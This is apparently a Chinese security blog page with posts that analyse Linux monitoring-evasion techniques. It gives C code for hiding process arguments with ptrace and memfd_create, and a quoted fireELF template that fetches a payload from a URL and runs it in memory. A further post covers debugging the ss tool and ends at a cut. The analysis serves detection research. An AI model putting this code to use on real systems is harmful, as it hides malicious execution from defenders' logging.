分类 系统安全 下的文章

利用ptrace和memfd_create混淆程序名和参数

说明

linux环境下无文件执行elf这篇文章中对ptrace中的memfd_create中的原理进行了说明,但是这个并不是ptrace的全部.在ptrace中还利用了ptrace这个系统调用对进程进行了修改,从而躲过了execve的检测.本文章就是对ptrace这个工具更加详细具体的分析.

在ptrace中除了使用到memfd_create()创建匿名的位于内存中的文件,之后还利用了ptrace这个系统调用.

PS:由于此款工具叫ptrace,同时ptrace也是一个系统调用.为了便于说明,工具就叫做ptrace工具,ptrace就称为ptrace系统调用.

源代码

ptrace工具的核心代码位于ptrace.c文件中.代码如下:

#include "ptrace.h"
#include "anonyexec.h"
#include "elfreader.h"
#include "common.h"
 
int main(int argc, char *argv[], char *envp[])
{
    pid_t  child = 0;
    long   addr  = 0, argaddr = 0;
    int    status = 0, i = 0, arc = 0;
    struct user_regs_struct regs;
    union
    {
        long val;
        char chars[sizeof(long)];
    } data;
    char *args[] = { "/bin/ls", "-a", "-l", NULL };
    uint64_t entry = elfentry(args[0]);    //_start: entry point
 
    child = fork();
    IFMSG(child == -1, 0, "fork");
    IF(child == 0, proc_child(args[0], args));
    MSG("child pid = %d\r\n", child);
    while(1)
    {
        wait(&status);
        if(WIFEXITED(status))
            break;
        // 获取寄存器中的值,并将其保存在regs中
        ptrace(PTRACE_GETREGS, child, NULL, ®s);
        if(regs.rip == entry)
        {
            MSG("EIP: _start %llx \r\n", regs.rip);
            MSG("RSP: %llx\r\n", regs.rsp);
            MSG("RSP + 8 => RDX(char **ubp_av) to __libc_start_main\r\n");
            //解析堆栈数据,栈顶为int argc
            addr = regs.rsp;
            arc = ptrace(PTRACE_PEEKTEXT, child, addr, NULL);
            MSG("argc: %d\r\n", arc);
            //POP ESI后栈顶为char **ubp_av, 同时可见此指针数组存储在堆栈之上
            addr += 8;
            //开始解析和修改参数
            for(i = 1;i < arc;i ++)
            {
                //ptrace(PTRACE_PEEKDATA, pid, addr, data)
                //从内存地址中读取一个字节,pid表示被跟踪的子进程,内存地址由addr给出,data为用户变量地址用于返回读到的数据
                argaddr = ptrace(PTRACE_PEEKTEXT, child, addr + (i * sizeof(void*)), NULL);
                data.val = ptrace(PTRACE_PEEKTEXT, child, argaddr, NULL);
                MSG("src: ubp_av[%d]: %s\r\n", i, data.chars);
                MSG("dst: upb_av[%d]: %s\r\n", i, args[i]);
                //修改参数指针指向的内容,demo暂时不支持超过7个字符的参数
                strncpy(data.chars, args[i], sizeof(long) - 1);
                ptrace(PTRACE_POKETEXT, child, argaddr, data.val);
            }
            ptrace(PTRACE_CONT, child, NULL, NULL);
            ptrace(PTRACE_DETACH, child, NULL, NULL);
            break;
        }
        //调用一下 ptrace(PTRACE_SINGLESTEP) 就能完成这样的事情,这个调用会告诉内核,在子进程每执行完一条子令之后,就停一下
        ptrace(PTRACE_SINGLESTEP, child, NULL, NULL);
    }
    return 0;
}
 
static char *encryptedarg = "3abb6677af34ac57c0ca5828fd94f9d886c"
"26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523"
"eed7511e5a9e4b8ccb3a4686";
 
int proc_child(const char *path, char *argv[])
{
    int i = 1;
    ptrace(PTRACE_TRACEME, 0, NULL, NULL);
    for(i = 1;argv[i] != NULL;i ++)
        argv[i] = encryptedarg;
    anonyexec(path, argv);
    return 0;
}

运行结果

之前在kernel5.0 上面测试运行时,出现了如下的问题:

./ptrace          
child pid = 7392
/proc/self/fd/3: cannot access '3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686': No such file or directory
/proc/self/fd/3: cannot access '3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686': No such file or directory

但是在kernel4.18及其以下的内核都能够运行成功,成功运行的结果如下:

$ ./ptrace
child pid = 58894
EIP: _start 4042d4
RSP: 7ffe6a464980
RSP + 8 => RDX(char **ubp_av) to __libc_start_main
argc: 3
src: ubp_av[1]: 3abb6677
dst: upb_av[1]: -a
src: ubp_av[2]: 3abb6677
dst: upb_av[2]: -l
total 72
drwxrwxr-x.  4 spoock spoock   268 Aug 22 21:55 .
drwxr-xr-x. 10 spoock spoock   189 Aug 22 21:54 ..
drwxrwxr-x.  8 spoock spoock   163 Aug 22 21:54 .git
-rw-rw-r--.  1 spoock spoock   803 Aug 22 21:54 1.c
-rw-rw-r--.  1 spoock spoock   361 Aug 22 21:54 Makefile
-rw-rw-r--.  1 spoock spoock  2842 Aug 22 21:54 README
-rw-rw-r--.  1 spoock spoock   681 Aug 22 21:54 anonyexec.c
-rw-rw-r--.  1 spoock spoock   226 Aug 22 21:54 anonyexec.h
-rw-rw-r--.  1 spoock spoock  2488 Aug 22 21:55 anonyexec.o
-rw-rw-r--.  1 spoock spoock   527 Aug 22 21:54 common.h
-rw-rw-r--.  1 spoock spoock   230 Aug 22 21:54 elfreader.c
-rw-rw-r--.  1 spoock spoock   142 Aug 22 21:54 elfreader.h
-rw-rw-r--.  1 spoock spoock  1544 Aug 22 21:55 elfreader.o
drwxrwxr-x.  2 spoock spoock   174 Aug 22 21:54 libptrace
-rwxrwxr-x.  1 spoock spoock 13768 Aug 22 21:55 ptrace
-rw-rw-r--.  1 spoock spoock  2123 Aug 22 21:54 ptrace.c
-rw-rw-r--.  1 spoock spoock   328 Aug 22 21:54 ptrace.h
-rw-rw-r--.  1 spoock spoock  4568 Aug 22 21:55 ptrace.o

最终输出的total 72.....之后的信息,说明成功执行了ls -a -l

使用auditd监控,得到的结果如下:

type=SYSCALL msg=audit(1566540263.416:2144): arch=c000003e syscall=59 success=yes exit=0 a0=7fff5c378750 a1=7fff5c3788d0 a2=0 a3=7fff5c3781a0 items=2 ppid=58893 pid=58894 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts3 ses=1 comm="3" exe=2F6D656D66643A656C66202864656C6574656429 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key="procmon"
type=EXECVE msg=audit(1566540263.416:2144): argc=3 a0="/proc/self/fd/3" a1="3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686" a2="3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686"
type=CWD msg=audit(1566540263.416:2144):  cwd="/home/centos/Desktop/ptrace"
type=PATH msg=audit(1566540263.416:2144): item=0 name="/proc/self/fd/3" inode=264888 dev=00:04 mode=0100777 ouid=1000 ogid=1000 rdev=00:00 obj=unconfined_u:object_r:user_tmp_t:s0 objtype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
type=PATH msg=audit(1566540263.416:2144): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=1415463 dev=fd:00 mode=0100755 ouid=0 ogid=0 rdev=00:00 obj=system_u:object_r:ld_so_t:s0 objtype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
type=PROCTITLE msg=audit(1566540263.416:2144): proctitle=2F70726F632F73656C662F66642F330033616262363637376166333461633537633063613538323866643934663964383836633236636535396138636536306563663637373830373934323364636366663164366631396362363535383035643536303938653664333861316137313064656535393532336565643735313165

发现通过1execve获取到的结果是:

a0="/proc/self/fd/3" a1="3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686" a2="3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686"

并没有捕获到ls -a -l的命令

直接观察/proc下面的进程信息,得到的结果如下:

{
    "pid": "58894",
    "ppid": "58893",
    "uid": "1000",
    "cmdline": "/proc/self/fd/3 3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686 3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686 ",
    "exe": "/memfd:elf (deleted)",
    "cwd": "/home/centos/Desktop/ptrace"
}

发现cmdline的结果与audit监控到的结果一样,但exe(/memfd:elf(deleted))却暴露了其文件是由memfd_create()创建的.

其实程序执行的是ls -a -l,但是最终监控到的只有/proc/self/fd/3 3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e 3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686完全隐藏了执行的进程名和参数,完全无法检测到.这也就是ptrace这个工具说的Linux低权限模糊化执行的程序名和参数,避开基于execve系统调用监控的命令日志.

原理分析

ptrace首先定义了自己需要执行的实际的命令:

char *args[] = { "/bin/ls", "-a", "-l", NULL };

整个工具就是围绕实际执行/bin/ls -a -l却不会被检测出来展开的.

fork创建子进程

child = fork();
IFMSG(child == -1, 0, "fork");
IF(child == 0, proc_child(args[0], args));
MSG("child pid = %d\r\n", child);

通过fork()创建一个子进程,创建成功,子进程执行proc_child(args[0], args).

static char *encryptedarg = "3abb6677af34ac57c0ca5828fd94f9d886c"
"26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523"
"eed7511e5a9e4b8ccb3a4686";
 
int proc_child(const char *path, char *argv[])
{
    int i = 1;
    ptrace(PTRACE_TRACEME, 0, NULL, NULL);
    for(i = 1;argv[i] != NULL;i ++)
        argv[i] = encryptedarg;
    anonyexec(path, argv);
    return 0;
}

首先分析for()循环,当子进程实际执行proc_child()时:

  • path:/bin/ls
  • argv[]:char args[] = { "/bin/ls", "-a", "-l", NULL };
    经过for循环之后,path和argv变为了:
  • path:/bin/ls
  • argv[]:char args[] = { "/bin/ls", "3abb6677af34ac5.........", "3abb6677af34ac5.........", NULL };此时再调用anonyexec(path, argv);,按照linux环境下无文件执行elf分析,最终执行的就是/proc/self/fd/3 3abb6677....... 3abb6677....... 其中的/proc/self/fd/3就是/bin/ls.到这里,实际上我们只是执行了ls,并不是/bin/ls -a -l.

父进程调试子进程

在proc_child()中存在如下代码:ptrace(PTRACE_TRACEME, 0, NULL, NULL); 借用玩转ptrace (一)这篇文章中的说法:

ptrace 的使用流程一般是这样的:父进程 fork() 出子进程,子进程中执行我们所想要 trace 的程序,在子进程调用 exec() 之前,子进程需要先调用一次 ptrace,以 PTRACE_TRACEME 为参数。这个调用是为了告诉内核,当前进程已经正在被 traced,当子进程执行 execve() 之后,子进程会进入暂停状态,把控制权转给它的父进程(SIG_CHLD信号), 而父进程在fork()之后,就调用 wait() 等子进程停下来,当 wait() 返回后,父进程就可以去查看子进程的寄存器或者对子进程做其它的事情了

所以在父进程的while(1)循环中有wait(&status);就是用来处理子进程的.

修改子进程

确认执行ls

uint64_t entry = elfentry(args[0]);    //_start: entry point
....
ptrace(PTRACE_GETREGS, child, NULL, &regs);
if(regs.rip == entry)
{
    .....
  • uint64_t entry = elfentry(args[0]); 其中的args[0]就是/bin/ls,所以entry其实就是得到/bin/ls的entry
  • ptrace(PTRACE_GETREGS, child, NULL, ®s); 获取child进程的寄存器的值,并将其保存到®s中,®s是一个user_regs_struct类型的结构体
  • if(regs.rip == entry) 这个的含义就是判断如果判断当前的执行的进程如果是正在执行/bin/ls,则进入到下面的处理流程中

获取参数个数

//解析堆栈数据,栈顶为int argc
addr = regs.rsp;
arc = ptrace(PTRACE_PEEKTEXT, child, addr, NULL);

ptrace(PTRACE_PEEKDATA, pid, addr, data),从内存地址中读取一个字节,pid表示被跟踪的子进程,内存地址由addr给出,所以上面就是获取栈顶数据,就是参数个数.

修改参数值

for(i = 1;i < arc;i ++)
{
    //ptrace(PTRACE_PEEKDATA, pid, addr, data)
    //从内存地址中读取一个字节,pid表示被跟踪的子进程,内存地址由addr给出,data为用户变量地址用于返回读到的数据
    argaddr = ptrace(PTRACE_PEEKTEXT, child, addr + (i * sizeof(void*)), NULL);
    data.val = ptrace(PTRACE_PEEKTEXT, child, argaddr, NULL);
    MSG("src: ubp_av[%d]: %s\r\n", i, data.chars);
    MSG("dst: upb_av[%d]: %s\r\n", i, args[i]);
    //修改参数指针指向的内容,demo暂时不支持超过7个字符的参数
    strncpy(data.chars, args[i], sizeof(long) - 1);
    ptrace(PTRACE_POKETEXT, child, argaddr, data.val);
}

由于第一个参数args[0]的值是/bin/ls,并不需要进行修改.在前面fork创建子进程的这一章节中,args[1]和args[2]的参数都是3abb6677....... .

  1. 通过ptrace()获取到寄存器中的值,实际就是3abb6677.......
  2. 利用strncpy(data.chars, args[i], sizeof(long) - 1); 进行修改
  3. ptrace(PTRACE_POKETEXT, child, argaddr, data.val); 写回寄存器

以上三步就修改了寄存器中的值,由原来的3abb6677....... 分别修改为了-a 和-l
最后调用ptrace(PTRACE_CONT/PTRACE_DETACH/PTRACE_SINGLESTEP, child, NULL, NULL);结束整个ptrace的操作.
所以父进程通过ptrace的方式,修改了位于寄存器中的参数值,而可执行的binary通过过memfd_create()的方式最终也变为了/proc/self/fd/3,所以通过execve和/proc的cmdline观察并不能看到真实执行的命令.

总结

对ptrace的分析整体下来十分有趣.通过对ptrace的分析,其实也告诉了我们,进程的cmdline并不可靠,execve获取执行命令不一定是实际执行的命令.那么在execve和cmdline都不一定完全可靠的情况下,我们有如何能够检测到这种行为呢?当然通过syscall hook ptrace当然是可以捕获到通过ptrace来修改进程的参数的行为,但是syscall hook是不是一个唯一解呢?

参考

Linux环境下无文件执行elf

说明

有关linux无文件渗透执行elf的文章晚上已经有非常多了,比如In-Memory-Only ELF Execution (Without tmpfs)ELF in-memory execution以及这两篇文章对应的中文版本Linux无文件渗透执行ELFLinux系统内存执行ELF的多种方式,还存在部分工具fireELF(介绍:fireELF:无文件Linux恶意代码框架).所有的无文件渗透最关键的方法就是memfd_create()这个方法.

MEMFD_CREATE

关于MEMFD_CREATE,在其介绍上面的说明如下:MEMFD_CREATE
int memfd_create(const char *name, unsigned int flags);

memfd_create() creates an anonymous file and returns a file descriptor that refers to it. The file behaves like a regular file,and so can be modified, truncated, memory-mapped, and so on.However, unlike a regular file, it lives in RAM and has a volatile backing storage. Once all references to the file are dropped, it is automatically released. Anonymous memory is used for all backing pages of the file. Therefore, files created by memfd_create() have the same semantics as other anonymous memory allocations such as those allocated using mmap with the MAP_ANONYMOUS flag.

The initial size of the file is set to 0. Following the call, the file size should be set using ftruncate(2). (Alternatively, the file may be populated by calls to write(2) or similar.)

The name supplied in name is used as a filename and will be displayed as the target of the corresponding symbolic link in the directory /proc/self/fd/. The displayed name is always prefixed with memfd: and serves only for debugging purposes. Names do not affect the behavior of the file descriptor, and as such multiple files can have the same name without any side effects.

翻译为中文就是:
memfd_create()会创建一个匿名文件并返回一个指向这个文件的文件描述符.这个文件就像是一个普通文件一样,所以能够被修改,截断,内存映射等等.不同于一般文件,此文件是保存在RAM中.一旦所有指向这个文件的连接丢失,那么这个文件就会自动被释放.匿名内存用于此文件的所有的后备存储.所以通过memfd_create()创建的匿名文件和通过mmap以MAP_ANONYMOUS的flag创建的匿名文件具有相同的语义.
这个文件的初始化大小是0,之后可以通过ftruncate或者write的方式设置文件大小.
memfd_create()函数提供的文件名,将会在/proc/self/fd所指向的连接上展现出来,但是文件名通常会包含有memfd的前缀.这个文件名仅仅只是用来debug,对这个匿名文件的使用没有任何的影响,同时多个文件也能够有一个相同的文件名.

在介绍完了memfd_create()之后,我们将以几个实际的例子来说明情况.

ptrace

ptrace是由奇安信推出的一个开源的工具,其介绍是 Linux低权限模糊化执行的程序名和参数,避开基于execve系统调用监控的命令日志.其示例代码如下:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <linux/memfd.h>
#include <sys/syscall.h>
#include <errno.h>
 
int anonyexec(const char *path, char *argv[])
{
    int   fd, fdm, filesize;
    void *elfbuf;
    char  cmdline[256];
 
    fd = open(path, O_RDONLY);
    filesize = lseek(fd, SEEK_SET, SEEK_END);
    lseek(fd, SEEK_SET, SEEK_SET);
    elfbuf = malloc(filesize);
    read(fd, elfbuf, filesize);
    close(fd);
    fdm = syscall(__NR_memfd_create, "elf", MFD_CLOEXEC);
    ftruncate(fdm, filesize);
    write(fdm, elfbuf, filesize);
    free(elfbuf);
    sprintf(cmdline, "/proc/self/fd/%d", fdm);
    argv[0] = cmdline;
    execve(argv[0], argv, NULL);
    free(elfbuf);
    return -1;
}
 
int main()
{
    char *argv[] = {"/bin/uname", "-a", NULL};
    int result =anonyexec("/bin/uname", argv);
    return result;
}

对以上的代码进行分析

lseek

lseek的函数原型是:

#include <unistd.h>
 
off_t lseek(int fd,off_t offset,int whence); /*Returns new file offset if successful, or -1 on error*/

其中whence的取值有三个,分别是SEEK_SET,SEEK_CUR,SEEK_END三个值,取值不同对offset的解释也不同,具体参考LSEEK(2)

而本例中的 filesize = lseek(fd, SEEK_SET, SEEK_END); 等价于 filesize = lseek(fd, 0, SEEK_END); 表示获取整个文件的大小

fd = open(path, O_RDONLY);
filesize = lseek(fd, SEEK_SET, SEEK_END);
lseek(fd, SEEK_SET, SEEK_SET);
elfbuf = malloc(filesize);
read(fd, elfbuf, filesize);

所以上面的代码含义就是:读取path文件,通过lseek获取path文件的大小,并通过write函数将path文件的内容写入到elfbuf中.

memfd_create

按照我们前面对memfd_create的讨论,直接通过memfd_creat("elf", MFD_CLOEXEC);这样理论上就可以得到一个匿名文件的fd 和上面代码中的 syscall(__NR_memfd_create, "elf", MFD_CLOEXEC);是完全等价的

关于这一点我非常的纳闷,后来看了In-Memory-Only ELF Execution 才知道这篇文章中使用的perl语言,考虑到在perl语言中没有libc库,所以无法直接调用memfd_create()函数.所以需要借助与syscall的方式调用memfd_create()方法.那么通过syscall()调用需要知道memfd_create()的系统调用码.

$ uname -a
Linux 5.0.0-25-generic #26~18.04.1-Ubuntu SMP Thu Aug 1 13:51:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
/usr/include$ egrep -r '__NR_memfd_create|MFD_CLOEXEC' *
asm-generic/unistd.h:#define __NR_memfd_create 279
asm-generic/unistd.h:__SYSCALL(__NR_memfd_create, sys_memfd_create)
linux/memfd.h:#define MFD_CLOEXEC       0x0001U
valgrind/vki/vki-scnums-x86-linux.h:#define __NR_memfd_create       356
valgrind/vki/vki-scnums-ppc64-linux.h:#define __NR_memfd_create 360
valgrind/vki/vki-scnums-arm-linux.h:#define __NR_memfd_create               385
valgrind/vki/vki-scnums-mips64-linux.h:#define __NR_memfd_create           (__NR_Linux + 314)
valgrind/vki/vki-scnums-s390x-linux.h:#define __NR_memfd_create 350
valgrind/vki/vki-scnums-arm64-linux.h:#define __NR_memfd_create 279
valgrind/vki/vki-scnums-ppc32-linux.h:#define __NR_memfd_create 360
valgrind/vki/vki-scnums-mips32-linux.h:#define __NR_memfd_create        (__NR_Linux + 354)
valgrind/vki/vki-scnums-amd64-linux.h:#define __NR_memfd_create       319
x86_64-linux-gnu/bits/mman-shared.h:# ifndef MFD_CLOEXEC
x86_64-linux-gnu/bits/mman-shared.h:#  define MFD_CLOEXEC 1U
x86_64-linux-gnu/bits/syscall.h:#ifdef __NR_memfd_create
x86_64-linux-gnu/bits/syscall.h:# define SYS_memfd_create __NR_memfd_create
x86_64-linux-gnu/asm/unistd_32.h:#define __NR_memfd_create 356
x86_64-linux-gnu/asm/unistd_x32.h:#define __NR_memfd_create (__X32_SYSCALL_BIT + 319)
x86_64-linux-gnu/asm/unistd_64.h:#define __NR_memfd_create 319

memfd_create的函数调用码是319,MFD_CLOEXEC对应的值是1U.综合以下的三种方式都是等价的:

  • memfd_create("elf",MFD_CLOSEXEC)
  • syscall(__NR_memfd_create, "elf", MFD_CLOEXEC);
  • syscall(319,"elf",1);

除此之外,还要说明下MFD_CLOEXEC这个设置的含义.MFD_CLOEXEC等同于close-on-exec.顾名思义,就是在运行完毕之后关闭这个文件句柄.在复杂系统中,有时我们fork子进程时已经不知道打开了多少个文件描述符(包括socket句柄等),这此时进行逐一清理确实有很大难度。我们期望的是能在fork子进程前打开某个文件句柄时就指定好:“这个句柄我在fork子进程后执行exec时就关闭”。其实时有这样的方法的:即所谓的 close-on-exec。

execve

执行的关键代码是:

sprintf(cmdline, "/proc/self/fd/%d", fdm);
argv[0] = cmdline;
execve(argv[0], argv, NULL);

将所得到的匿名文件句柄赋值给当前进程的文件描述符,返回给cmdline,所以cmdline就是当前进程的文件描述符(其内容就是anonyexec函数所传递过来的path的内容)
所以execve(argv[0],argv,NULL),在本例中就等同于execve("/binuname","-a",NULL);
通过auditd监控,我们得到的结果如下:

type=EXECVE msg=audit(1566354435.549:153): argc=2 a0="/proc/self/fd/4" a1="-a"
type=CWD msg=audit(1566354435.549:153): cwd="/home/spoock/Desktop/test"
type=PATH msg=audit(1566354435.549:153): item=0 name="/proc/self/fd/4" inode=1550663 dev=00:05 mode=0100777 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0
type=PATH msg=audit(1566354435.549:153): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=11014834 dev=08:02 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0
type=PROCTITLE msg=audit(1566354435.549:153): proctitle="./a.out"

捕获到的代码执行的语句是 type=EXECVE msg=audit(1566354435.549:153): argc=2 a0="/proc/self/fd/4" a1="-a" 根本就没有出现uname,而是/proc/self/fd/4,躲避了利用execve进行命令监控的检测.

通过监控proc,得到对应的信息是: {"pid":"8360","ppid":"22571","uid":"1000","cmdline":"/proc/self/fd/4 -a ","exe":"/memfd:elf (deleted)","cwd":"/home/spoock/Desktop/test"} 与auditd监控到的数据是吻合的.

至于memfd_create()函数提供的文件名,在exe上面体现出来了,即/memfd:elf (deleted),以memfd:开头紧接着是文件名.

ELF in-memory execution

再来看看在ELF in-memory execution中的示例程序,与ptrace的程序还是存在区别.

#include <stdio.h>
#include <stdlib.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
 
int main() {
    int fd;
    pid_t child;
    char buf[BUFSIZ] = "";
    ssize_t br;
 
    fd = syscall(SYS_memfd_create, "foofile", 0);
    if (fd == -1) {
        perror("memfd_create");
        exit(EXIT_FAILURE);
    }
 
    child = fork();
    if (child == 0) {
        dup2(fd, 1);
        close(fd);
        execlp("/bin/date", "", NULL);
        perror("execlp date");
        exit(EXIT_FAILURE);
    } else if (child == -1) {
        perror("fork");
        exit(EXIT_FAILURE);
    }
 
    waitpid(child, NULL, 0);
 
    lseek(fd, 0, SEEK_SET);
    br = read(fd, buf, BUFSIZ);
    if (br == -1) {
        perror("read");
        exit(EXIT_FAILURE);
    }
    buf[br] = 0;
 
    printf("pid:%d\n", getpid());
    printf("child said: '%s'\n", buf);
    pause();
    exit(EXIT_SUCCESS);
}

与ptrace不同的是,上述的代码使用了fork()来实现无文件渗透的目的.前面的fd = syscall(SYS_memfd_create, "foofile", 0);和ptrace的含义一样,这里就不做说明了.

fork

child = fork();
if (child == 0) {
    dup2(fd, 1);
    close(fd);
    execlp("/bin/date", "/bin/date", NULL);
    perror("execlp date");
    exit(EXIT_FAILURE);
} else if (child == -1) {
    perror("fork");
    exit(EXIT_FAILURE);
}
  1. child=fork(),fork得到一个子进程;
  2. child == 0 判断当前的进程是否为子进程,如果是子进程,就进行后面的操作;
  3. dup2(fd, 1);close(fd); 将子进程的1文件描述符(标准输出)指向fd
  4. execlp("/bin/date", "/bin/date", NULL); execlp()和execve()的作用一样,都是执行程序.在这里就是执行/bin/date代码;

由于子进程已经将标准输出指向了fd,那么通过execlp("/bin/date", "/bin/date", NULL);执行的结果就会写入到fd中.

read

关于fork,我们需要明确的是,执行fork()时,子进程会获得父进程所以文件描述符的副本.这些副本的创建方式类似于dup(),这也意味着父,子进程中对应的描述符均指向相同的打开文件句柄.所以在子进程对fd修改了之后,在父进程中也是能够看到对fd修改的.

分析下面的代码:

lseek(fd, 0, SEEK_SET);
br = read(fd, buf, BUFSIZ);
if (br == -1) {
     perror("read");
     exit(EXIT_FAILURE);
}
buf[br] = 0;
  1. lseek(fd, 0, SEEK_SET); 将文件fd的偏移量重置为文件开头
  2. br = read(fd, buf, BUFSIZ); 读取fd的大小至buf中,并返回读取文件的长度br
  3. buf[br] = 0; 将最后一个字符设置为0

最终就是通过printf("child said: '%s'n", buf); 打印fd的结果,其实就是/bin/date的执行结果.
我们分析通过audit和proc下面来观察执行过程.
audit的查看结果如下:

type=SYSCALL msg=audit(1566374961.124:5777): arch=c000003e syscall=59 success=yes exit=0 a0=55d8b6c9ac1a a1=7ffdd40de700 a2=7ffdd40e08a8 a3=0 items=2 ppid=22918 pid=22919 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts1 ses=2 comm="date" exe="/bin/date" key="rule01_exec_command"
type=EXECVE msg=audit(1566374961.124:5777): argc=1 a0=""
type=CWD msg=audit(1566374961.124:5777): cwd="/home/spoock/Desktop/test"
type=PATH msg=audit(1566374961.124:5777): item=0 name="/bin/date" inode=8912931 dev=08:02 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0
type=PATH msg=audit(1566374961.124:5777): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=11014834 dev=08:02 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0 cap_fi=0 cap_fe=0 cap_fver=0
type=PROCTITLE msg=audit(1566374961.124:5777): proctitle="(null)"

在proc中查看的信息:

$ ls -al /proc/22918/fd
total 0
dr-x------ 2 spoock spoock  0 Aug 21 17:58 .
dr-xr-xr-x 9 spoock spoock  0 Aug 21 17:52 ..
lrwx------ 1 spoock spoock 64 Aug 21 17:58 0 -> /dev/pts/1
lrwx------ 1 spoock spoock 64 Aug 21 17:58 1 -> /dev/pts/1
lrwx------ 1 spoock spoock 64 Aug 21 17:58 2 -> /dev/pts/1
lrwx------ 1 spoock spoock 64 Aug 21 17:58 3 -> '/memfd:foofile (deleted)'
 
$ ls -al /proc/22918/exe
lrwxrwxrwx 1 spoock spoock 0 Aug 21 17:52 /proc/22918/exe -> /home/spoock/Desktop/test/a.out

这个特征还是很明显的,文件描述符3和ptrace的特征是一样的,都是以memfd开头,后面跟着是通过memfd_create()创建的匿名文件的名字.

fireELF

fireELF也是一款无文件的渗透测试工具,其介绍如下:

fireELF is a opensource fileless linux malware framework thats crossplatform and allows users to easily create and manage payloads. By default is comes with 'memfd_create' which is a new way to run linux elf executables completely from memory, without having the binary touch the harddrive.

根据其介绍,说明其也是通过memfd_create()的方式来创建一个位于内存中的匿名文件进行无文件渗透实验的.分析其核心代码:simple.py

import base64
 
desc = {"name" : "memfd_create", "description" : "Payload using memfd_create", "archs" : "all", "python_vers" : ">2.5"}
 
def main(is_url, url_or_payload):
    payload = '''import ctypes, os, urllib2, base64
libc = ctypes.CDLL(None)
argv = ctypes.pointer((ctypes.c_char_p * 0)(*[]))
syscall = libc.syscall
fexecve = libc.fexecve'''
    if is_url:
        payload += '\ncontent = urllib2.urlopen("{}").read()'.format(url_or_payload)
    else:
        encoded_payload = base64.b64encode(url_or_payload).decode()
        payload += '\ncontent = base64.b64decode("{}")'.format(encoded_payload)
    payload += '''\nfd = syscall(319, "", 1)
os.write(fd, content)
fexecve(fd, argv, argv)'''
    return payload

其实关键代码还是:

libc = ctypes.CDLL(None)
argv = ctypes.pointer((ctypes.c_char_p * 0)(*[]))
syscall = libc.syscall
fd = syscall(319, "", 1)
fexecve = libc.fexecve
os.write(fd, content)
fexecve(fd, argv, argv)

本质上还是调用memfd_create()创建了一个匿名文件,通过os.write(fd, content)注入payload,最后利用fexecve(fd, argv, argv)执行.和前面的两种做法本质上还是一样的.

总结

无文件执行elf本质上其实就是利用了memfd_create()创建了一个位于内存中的匿名文件,某种程度上给检测还是带来一些挑战.虽然如此,通过memfd_create()的方式执行elf还是有一些特征的.

参考

Linux无文件渗透执行ELF
Linux系统内存执行ELF的多种方式

ss源代码调试&原理分析

源代码调试

ss是位于iproute2这个库中,可以从iproute2上面下载到源代码,配置其源代码调试的方式和netstat源代码调试这篇文章一样.

在根目录下创建CMakeLists.txt文件,内容如下:

cmake_minimum_required(VERSION 3.13)
project(test C)
 
set(BUILD_DIR .)
 
#add_executable()
add_custom_target(ss command -c ${BUILD_DIR})

同时修改Makefile文件中的45行的CCOPTS = -O2CCOPTS = -O0 -g3

在clion中配置Target:

clion-settings.png

Netid  State      Recv-Q Send-Q Local Address:Port             Peer Address:Port
tcp    ESTAB      0      0      127.0.0.1:57354                127.0.0.1:socks               
tcp    ESTAB      0      0      127.0.0.1:37350                127.0.0.1:socks               
tcp    ESTAB      0      0      172.16.40.154:43450                45.8.223.61:17250               
tcp    CLOSE-WAIT 1      0      127.0.0.1:57398                127.0.0.1:socks               
tcp    ESTAB      0      0      127.0.0.1:57062                127.0.0.1:socks

和直接运行ss命令得到的结果一样.接下来就是分析整个ss程序的执行流程

main

